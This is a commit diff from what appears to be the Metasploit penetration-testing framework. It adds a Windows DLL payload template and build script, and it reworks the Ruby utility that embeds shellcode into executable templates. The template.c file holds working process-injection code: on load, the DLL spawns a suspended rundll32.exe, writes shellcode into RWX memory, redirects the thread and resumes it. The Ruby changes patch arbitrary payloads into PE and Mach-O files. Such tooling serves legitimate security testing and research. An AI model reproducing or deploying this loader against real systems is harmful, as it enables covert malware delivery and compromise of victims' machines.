fixup some of the payload exe generation/templating stuff, add pe/dll template+src

git-svn-id: file:///home/svn/framework3/trunk@9073 4d416f70-5f16-0410-b530-b9f4589650da
2024-10-29 18:07:27 +01:00 · 2010-04-14 21:44:23 +00:00 · 2010-04-14 21:44:23 +00:00 · 730b27eed1
commit 730b27eed1
parent b251c0c4b7
10 changed files with 180 additions and 23 deletions
--- a/data/templates/src/pe/dll/build.sh
+++ b/data/templates/src/pe/dll/build.sh
@ -0,0 +1,16 @@
+if [ -z "$PREFIX" ]; then
+  PREFIX=i586-mingw32msvc
+fi
+
+rm -f *.o *.dll
+$PREFIX-gcc -c template.c
+$PREFIX-windres -o rc.o template.rc
+$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
+rm -f junk.tmp
+$PREFIX-dlltool --dllname template.dll --base-file base.tmp --output-exp temp.exp --def template.def
+rm -f base.tmp
+$PREFIX-gcc -mdll -o template.dll template.o rc.o -Wl,temp.exp
+rm -f temp.exp
+
+$PREFIX-strip template.dll
+rm -f *.o
--- a/data/templates/src/pe/dll/template.c
+++ b/data/templates/src/pe/dll/template.c
@ -0,0 +1,82 @@
+#include <windows.h>
+#include "template.h"
+
+
+void ExecutePayload(void);
+
+BOOL WINAPI
+DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
+{
+    switch (dwReason)
+    {
+        case DLL_PROCESS_ATTACH:
+			ExecutePayload();
+            break;
+
+        case DLL_PROCESS_DETACH:
+            // Code to run when the DLL is freed
+            break;
+
+        case DLL_THREAD_ATTACH:
+            // Code to run when a thread is created during the DLL's lifetime
+            break;
+
+        case DLL_THREAD_DETACH:
+            // Code to run when a thread ends normally.
+            break;
+    }
+    return TRUE;
+}
+
+void ExecutePayload(void) {
+    int error;
+	PROCESS_INFORMATION pi;
+	STARTUPINFO si;
+	CONTEXT ctx;
+	DWORD ep, prot;
+
+	// Start up the payload in a new process
+	ZeroMemory( &si, sizeof( si ));
+	si.cb = sizeof(si);
+
+	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+		GetThreadContext(pi.hThread, &ctx);
+
+		ep = (DWORD) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+
+		ctx.Eip = ep;
+        SetThreadContext(pi.hThread,&ctx);
+
+        ResumeThread(pi.hThread);
+        CloseHandle(pi.hThread);
+        CloseHandle(pi.hProcess);
+	}
+   // ExitProcess(0);
+   ExitThread(0);
+}
+
+/*
+typedef VOID
+(NTAPI *PIMAGE_TLS_CALLBACK) (
+    PVOID DllHandle,
+    ULONG Reason,
+    PVOID Reserved
+    );
+
+VOID NTAPI TlsCallback(
+      IN PVOID DllHandle,
+      IN ULONG Reason,
+      IN PVOID Reserved)
+{
+	__asm  ( "int3" );
+}
+
+ULONG _tls_index;
+PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
+IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
+*/
+
--- a/data/templates/src/pe/dll/template.def
+++ b/data/templates/src/pe/dll/template.def
@ -0,0 +1,3 @@
+EXPORTS
+DllMain@12
+
--- a/data/templates/src/pe/dll/template.h
+++ b/data/templates/src/pe/dll/template.h
--- a/data/templates/src/pe/dll/template.rc
+++ b/data/templates/src/pe/dll/template.rc
@ -0,0 +1,18 @@
+
+LANGUAGE 9, 1
+
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 0,0,0,1
+ PRODUCTVERSION 0,0,0,1
+ FILEFLAGSMASK 0x17L
+ FILEFLAGS 0x0L
+ FILEOS 0x4L
+ FILETYPE 0x2L
+ FILESUBTYPE 0x0L
+BEGIN
+
+END
+
+#define RT_HTML  23
+
--- a/data/templates/template.dll
+++ b/data/templates/template.dll
--- a/data/templates/template_armle_darwin.bin
+++ b/data/templates/template_armle_darwin.bin
--- a/data/templates/template_ppc_darwin.bin
+++ b/data/templates/template_ppc_darwin.bin
--- a/data/templates/template_x86_darwin.bin
+++ b/data/templates/template_x86_darwin.bin
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ###
 #
 # framework-util-exe
@ -90,7 +94,7 @@ require 'metasm'
 				raise RuntimeError, "Junk at end of file. Is this a packed exe?"
 			end

-			#find first section file offset and free RVA for new section 
+			#find first section file offset and free RVA for new section
 			free_rva = pe.hdr.opt.AddressOfEntryPoint
 			first_off = fsize
 			pe.sections.each do |sec|
@ -103,12 +107,12 @@ require 'metasm'
 			#See if we can add a section
 			first_sechead_file_off = pe.hdr.dos.e_lfanew + Rex::PeParsey::PeBase::IMAGE_FILE_HEADER_SIZE + pe.hdr.file.SizeOfOptionalHeader
 			new_sechead_file_off = first_sechead_file_off + pe.hdr.file.NumberOfSections * Rex::PeParsey::PeBase::IMAGE_SIZEOF_SECTION_HEADER
-			if new_sechead_file_off + Rex::PeParsey::PeBase::IMAGE_SIZEOF_SECTION_HEADER > first_off	
+			if new_sechead_file_off + Rex::PeParsey::PeBase::IMAGE_SIZEOF_SECTION_HEADER > first_off
 				raise RuntimeError, "Not enough room for new section header"
 			end

 			# figure out where in the new section to put the start. Right now just putting at the beginning of the new section
-			start_rva = free_rva 
+			start_rva = free_rva

 			#make new section, starting at free RVA
 			new_sec = win32_rwx_exec_thread(code, pe.hdr.opt.AddressOfEntryPoint - start_rva)
@ -282,8 +286,10 @@ require 'metasm'
 		end

 		bo = pe.index('PAYLOAD:')
-		pe[bo,  2048] = code if bo
-		pe[136,    4] = [rand(0x100000000)].pack('V')
+		raise RuntimeError, "Invalid Win32 PE OLD EXE template!" if not bo
+		pe[bo, code.length] = code
+
+		pe[136, 4] = [rand(0x100000000)].pack('V')

 		ci = pe.index("\x31\xc9" * 160)
 		cd = pe.index("\x31\xc9" * 160, ci + 320)
@ -314,7 +320,8 @@ require 'metasm'
 		fd.close

 		bo = pe.index('PAYLOAD:')
-		pe[bo,2048] = [code].pack('a2048') if bo
+		raise RuntimeError, "Invalid Win64 PE EXE template!" if not bo
+		pe[bo, code.length] = code

 		return pe
 	end
@ -327,16 +334,32 @@ require 'metasm'
 		fd.close

 		bo = pe.index('PAYLOAD:')
-		pe[bo, 2048] = [code].pack('a2048') if bo
+		raise RuntimeError, "Invalid Win32 PE Service EXE template!" if not bo
+		pe[bo, code.length] = code

 		bo = pe.index('SERVICENAME')
-		pe[bo, 11] = [name].pack('a11') if bo
+		raise RuntimeError, "Invalid Win32 PE Service EXE template!" if not bo
+		pe[bo, name.length] = name

 		pe[136, 4] = [rand(0x100000000)].pack('V')

 		return pe
 	end

+	def self.to_win32pe_dll(framework, code)
+		pe = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template.dll"), "rb")
+		pe = fd.read(fd.stat.size)
+		fd.close
+
+		bo = pe.index('PAYLOAD:')
+		raise RuntimeError, "Invalid Win32 PE DLL template!" if not bo
+		pe[bo, code.length] = code
+
+		return pe
+	end
+
 	def self.to_osx_arm_macho(framework, code)
 		mo = ''

@ -344,10 +367,14 @@ require 'metasm'
 		mo = fd.read(fd.stat.size)
 		fd.close

-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+		bo = mo.index('PAYLOAD:')
+		raise RuntimeError, "Invalid OSX ArmLE Mach-O template!" if not bo
+		mo[bo, code.length] = code
+
+		# Not used?
+		#co = mo.index('COMMENT:')
+		#mo[co, comment.length] = comment

-		mo[bo, 2048] = [code].pack('a2048') if bo
 		return mo
 	end

@ -358,10 +385,13 @@ require 'metasm'
 		mo = fd.read(fd.stat.size)
 		fd.close

-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+		bo = mo.index('PAYLOAD:')
+		raise RuntimeError, "Invalid OSX PPC Mach-O template!" if not bo
+		mo[bo, code.length] = code

-		mo[bo, 2048] = [code].pack('a2048') if bo
+		# Not used?
+		#co = mo.index('COMMENT:')
+		#mo[co, comment.length] = comment

 		return mo
 	end
@ -373,10 +403,13 @@ require 'metasm'
 		mo = fd.read(fd.stat.size)
 		fd.close

-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+		bo = mo.index('PAYLOAD:')
+		raise RuntimeError, "Invalid OSX x86 Mach-O template!" if not bo
+		mo[bo, code.length] = code

-		mo[bo, 2048] = [code].pack('a2048') if bo
+		# Not used?
+		#co = mo.index('COMMENT:')
+		#mo[co, comment.length] = comment

 		return mo
 	end
@ -403,6 +436,7 @@ require 'metasm'

 		return mo
 	end
+
 	def self.to_exe_vba(exes='')
 		exe = exes.unpack('C*')
 		vba = ""
@ -1046,8 +1080,8 @@ require 'metasm'

 	# This wrapper is responsible for allocating RWX memory, copying the
 	# target code there, setting an exception handler that calls ExitProcess,
-	# starting the code in a new thread, and finally jumping back to the next 
-	# code to execute. block_offset is the offset of the next code from 
+	# starting the code in a new thread, and finally jumping back to the next
+	# code to execute. block_offset is the offset of the next code from
 	# the start of this code
 	def self.win32_rwx_exec_thread(code, block_offset)

@ -1194,7 +1228,7 @@ require 'metasm'

 		exitblock:
 		#{stub_exit}
-		
+
 		set_handler:
 		  xor eax,eax
 ;		  push dword [fs:eax]
@ -1208,9 +1242,9 @@ require 'metasm'
 		  push 0x160D6838        ; hash( "kernel32.dll", "CreateThread" )
 		  call ebp               ; Spawn payload thread

-		  pop eax                ; Skip 
-;		  pop eax                ; Skip 
-		  pop eax                ; Skip 
+		  pop eax                ; Skip
+;		  pop eax                ; Skip
+		  pop eax                ; Skip
 		  popad                  ; Get our registers back
 ;		  sub esp, 44             ; Move stack pointer back past the handler
 		^